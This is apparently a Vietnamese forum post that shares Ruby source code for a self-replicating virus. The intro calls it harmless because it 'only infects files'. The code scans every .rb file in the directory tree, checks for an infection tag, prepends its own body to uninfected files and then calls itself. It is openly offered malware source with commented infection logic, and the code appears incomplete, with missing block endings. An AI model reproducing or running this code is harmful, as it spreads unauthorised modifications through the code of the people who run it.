Đoạn code này chỉ có tác dụng lây nhiễm file chưa thể phá hủy dữ liệu, hay làm bất cứ gì khác…Mọi người tham khảo nhé :
def infect_files
count = 0 # This will halt content reading after the virus_bottom tag
virus_top = '#0x3a' # Distinguishing tag telling us if the file is infected or not
virus_bottom = '#:' # Tag at the bottom of the virus to as a marker of what code to infect other programs with
files = Dir["./**/*.rb"] # Grab all the ruby files in the directory of the infected file.
files.each do |random_file| # For each ruby file in the same directory as the infected file
first_line = File.open(random_file, &:gets).strip # Grab the first line (to check the distinguishing tag at the top)
if first_line != virus_top # If the program is not infected
File.rename(random_file, 'tmp.rb') # Rename the normal file to tmp.rb
virus_file = File.open(__FILE__, "rb") # Open infecting file for reading
virus_contents = '' # Storing virus data until virus_bottom is hit
# This is necessary to prevent programs from writing their own content when embedding to other programs
virus_file.each_line do |line| # for every line in the infected file
virus_contents += line # Add each line to our virus content
if line =~ /#{virus_bottom}/
count += 1
if count == 2 then break end # Until we hit the virus_bottom tag
File.open(random_file, 'w') {|f| f.write(virus_contents) } # Write virus content to the old file's name
good_file = File.open('tmp.rb', 'rb') # Open the tmp.rb file (contains good code) for reading
good_contents = good_file.read # Grab the contents of the good file
File.open(random_file, 'a') {|f| f.write(good_contents)} # Append the good content to the random file
File.delete('tmp.rb') # Delete the temporary file
infect_files # Run the virus